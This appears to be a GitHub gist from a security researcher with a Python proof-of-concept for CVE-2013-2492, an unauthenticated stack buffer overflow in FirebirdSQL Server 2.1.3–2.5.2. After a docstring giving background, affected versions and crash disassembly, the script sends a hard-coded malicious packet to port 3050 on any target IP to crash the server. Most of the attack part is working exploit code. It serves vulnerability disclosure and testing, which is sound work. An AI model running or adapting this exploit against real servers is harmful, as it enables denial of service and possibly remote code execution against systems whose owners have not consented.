Skip to content

Instantly share code, notes, and snippets.

@zeroSteiner
Last active December 14, 2015 13:29
Show Gist options
  • Save zeroSteiner/85daef257831d904479c to your computer and use it in GitHub Desktop.
Save zeroSteiner/85daef257831d904479c to your computer and use it in GitHub Desktop.
Firebird Denial of Service Proof of Concept
#!/usr/bin/env python
"""
firebird_dos.py
Discovered: 1-31-2013
By: Spencer McIntyre (zeroSteiner)
SecureState Research and Innovation Team
www.securestate.com
Background:
-----------
FirebirdSQL Server Remote Unauthenticated Stack Buffer Overflow
Details:
--------
The FirebirdSQL server is vulnerable to a stack buffer overflow that can be
triggered when an unauthenticated user sends a specially crafted packet. The
result can lead to remote code execution as the user which runs the FirebirdSQL
server.
Vulnerable Versions:
--------------------
Tested on FirebirdSQL Server on Windows 2.1.3-2.1.5 and 2.5.1-2.5.2
Vendor: FirebirdSQL
Site: http://www.firebirdsql.org/
Crash Demonstration
(Addresses on 2.1.3)
00522031 8BF1 MOV ESI,ECX
00522033 8B06 MOV EAX,DWORD PTR DS:[ESI]
00522035 8B50 08 MOV EDX,DWORD PTR DS:[EAX+8]
00522038 57 PUSH EDI
00522039 FFD2 CALL EDX
References:
-----------
CVE-2013-2492
Firebird Issue Tracker Key CORE-4058
"""
import sys
import socket
def main():
if len(sys.argv) < 2:
print '[-] Usage: ' + sys.argv[0] + ' [TARGET_IP]'
return 0
data_1 = ""
data_1 += "00000001000000130000000200000024"
data_1 += "00000010433a5c746573745f66697265"
data_1 += "626972640000000400000022"
data_1 += "0510"
data_1 += "41414141424242424343434344444444"
data_1 += "05156c6f63616c"
data_1 += "686f73742e6c6f63616c646f6d61696e"
data_1 += "06000000000000090000000100000002"
data_1 += "00000005000000020000000a00000001"
data_1 += "000000020000000500000004ffff800b"
data_1 += "00000001000000020000000500000006"
data_1 += "000000010000000200000005"
data_1 += "0000000800"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 3050))
s.send(data_1.decode('hex'))
s.close()
if __name__ == '__main__':
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment